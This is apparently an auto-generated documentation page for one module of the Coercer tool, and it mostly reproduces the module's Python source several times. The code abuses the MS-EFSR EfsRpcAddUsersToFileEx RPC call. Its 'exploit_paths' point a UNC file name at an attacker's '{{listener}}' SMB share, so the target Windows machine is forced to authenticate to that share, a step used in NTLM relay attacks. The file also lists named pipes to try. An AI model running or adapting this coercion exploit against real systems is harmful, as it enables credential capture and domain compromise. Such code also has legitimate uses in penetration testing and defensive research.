coercer.methods.MS_EFSR.EfsRpcAddUsersToFileEx
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcAddUsersToFileEx.py 4# Author : Podalirius (@podalirius_) 5# Fixed by : XiaoliChan 6# Date created : 16 Sep 2022 7# Updated in : 18 Mar 2023 8 9 10from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 11from coercer.network.DCERPCSessionError import DCERPCSessionError 12from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 13from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID, NDRPOINTERNULL 14 15class EFS_RPC_BLOB(NDRSTRUCT): 16 structure = ( 17 ('Data', DWORD), 18 ('cbData', PCHAR), 19 ) 20 21class EFS_HASH_BLOB(NDRSTRUCT): 22 structure = ( 23 ('Data', DWORD), 24 ('cbData', PCHAR), 25 ) 26 27class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 28 structure = ( 29 ('Lenght', DWORD), 30 ('SID', RPC_SID), 31 ('Hash', EFS_HASH_BLOB), 32 ('Display', LPWSTR), 33 ) 34 35class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT): 36 structure = ( 37 ('nUsers', DWORD), 38 ('Users', ENCRYPTION_CERTIFICATE_HASH), 39 ) 40 41 42class _EfsRpcAddUsersToFileEx(NDRCALL): 43 opnum = 15 44 structure = ( 45 ('dwFlags', DWORD), # Type: DWORD 46 # Accroding to this page: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e 47 # Reserved must be set to NULL 48 ('Reserved', NDRPOINTERNULL), # Type: NDRPOINTERNULL * 49 ('FileName', WSTR), # Type: wchar_t * 50 ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST), # Type: ENCRYPTION_CERTIFICATE_LIST * 51 ) 52 53 54class _EfsRpcAddUsersToFileExResponse(NDRCALL): 55 structure = () 56 57 58class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL): 59 """ 60 61 62 https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e 63 """ 64 65 exploit_paths = [ 66 ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'), 67 ("smb", '\\\\{{listener}}\\Share\\\x00'), 68 ("smb", '\\\\{{listener}}\\Share\x00'), 69 ] 70 71 access = { 72 "ncan_np": [ 73 { 74 "namedpipe": r"\PIPE\efsrpc", 75 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 76 "version": "1.0" 77 }, 78 { 79 "namedpipe": r"\PIPE\lsarpc", 80 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 81 "version": "1.0" 82 }, 83 { 84 "namedpipe": r"\PIPE\samr", 85 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 86 "version": "1.0" 87 }, 88 { 89 "namedpipe": r"\PIPE\lsass", 90 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 91 "version": "1.0" 92 }, 93 { 94 "namedpipe": r"\PIPE\netlogon", 95 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 96 "version": "1.0" 97 }, 98 ], 99 "ncacn_ip_tcp": [ 100 { 101 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 102 "version": "1.0" 103 }, 104 { 105 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 106 "version": "1.0" 107 } 108 ] 109 } 110 111 protocol = { 112 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 113 "shortname": "MS-EFSR" 114 } 115 116 function = { 117 "name": "EfsRpcAddUsersToFileEx", 118 "opnum": 15, 119 "vulnerable_arguments": ["FileName"] 120 } 121 122 def trigger(self, dcerpc_session, target): 123 if dcerpc_session is not None: 124 try: 125 request = _EfsRpcAddUsersToFileEx() 126 # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags. 127 # The descriptions of the flags are specified in the following table. 128 # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates 129 # parameter MUST contain exactly one certificate. 130 # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate 131 EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002 132 EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004 133 request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE 134 request['FileName'] = self.path 135 resp = dcerpc_session.request(request) 136 return "" 137 except Exception as err: 138 return err 139 else: 140 print("[!] Error: dce is None, you must call connect() first.") 141 return None
class
EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
28class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 29 structure = ( 30 ('Lenght', DWORD), 31 ('SID', RPC_SID), 32 ('Hash', EFS_HASH_BLOB), 33 ('Display', LPWSTR), 34 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
36class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT): 37 structure = ( 38 ('nUsers', DWORD), 39 ('Users', ENCRYPTION_CERTIFICATE_HASH), 40 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
59class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL): 60 """ 61 62 63 https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e 64 """ 65 66 exploit_paths = [ 67 ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'), 68 ("smb", '\\\\{{listener}}\\Share\\\x00'), 69 ("smb", '\\\\{{listener}}\\Share\x00'), 70 ] 71 72 access = { 73 "ncan_np": [ 74 { 75 "namedpipe": r"\PIPE\efsrpc", 76 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 77 "version": "1.0" 78 }, 79 { 80 "namedpipe": r"\PIPE\lsarpc", 81 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 82 "version": "1.0" 83 }, 84 { 85 "namedpipe": r"\PIPE\samr", 86 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 87 "version": "1.0" 88 }, 89 { 90 "namedpipe": r"\PIPE\lsass", 91 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 92 "version": "1.0" 93 }, 94 { 95 "namedpipe": r"\PIPE\netlogon", 96 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 97 "version": "1.0" 98 }, 99 ], 100 "ncacn_ip_tcp": [ 101 { 102 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 103 "version": "1.0" 104 }, 105 { 106 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 107 "version": "1.0" 108 } 109 ] 110 } 111 112 protocol = { 113 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 114 "shortname": "MS-EFSR" 115 } 116 117 function = { 118 "name": "EfsRpcAddUsersToFileEx", 119 "opnum": 15, 120 "vulnerable_arguments": ["FileName"] 121 } 122 123 def trigger(self, dcerpc_session, target): 124 if dcerpc_session is not None: 125 try: 126 request = _EfsRpcAddUsersToFileEx() 127 # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags. 128 # The descriptions of the flags are specified in the following table. 129 # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates 130 # parameter MUST contain exactly one certificate. 131 # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate 132 EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002 133 EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004 134 request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE 135 request['FileName'] = self.path 136 resp = dcerpc_session.request(request) 137 return "" 138 except Exception as err: 139 return err 140 else: 141 print("[!] Error: dce is None, you must call connect() first.") 142 return None
exploit_paths =
[('smb', '\\\\{{listener}}\\Share\\file.txt\x00'), ('smb', '\\\\{{listener}}\\Share\\\x00'), ('smb', '\\\\{{listener}}\\Share\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
123 def trigger(self, dcerpc_session, target): 124 if dcerpc_session is not None: 125 try: 126 request = _EfsRpcAddUsersToFileEx() 127 # dwFlags: This MUST be set to a bitwise OR of 0 or more of the following flags. 128 # The descriptions of the flags are specified in the following table. 129 # If the EFSRPC_ADDUSERFLAG_REPLACE_DDF flag is used, then the EncryptionCertificates 130 # parameter MUST contain exactly one certificate. 131 # EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE don't need to supply certificate 132 EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002 133 EFSRPC_ADDUSERFLAG_REPLACE_DDF = 0x00000004 134 request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE 135 request['FileName'] = self.path 136 resp = dcerpc_session.request(request) 137 return "" 138 except Exception as err: 139 return err 140 else: 141 print("[!] Error: dce is None, you must call connect() first.") 142 return None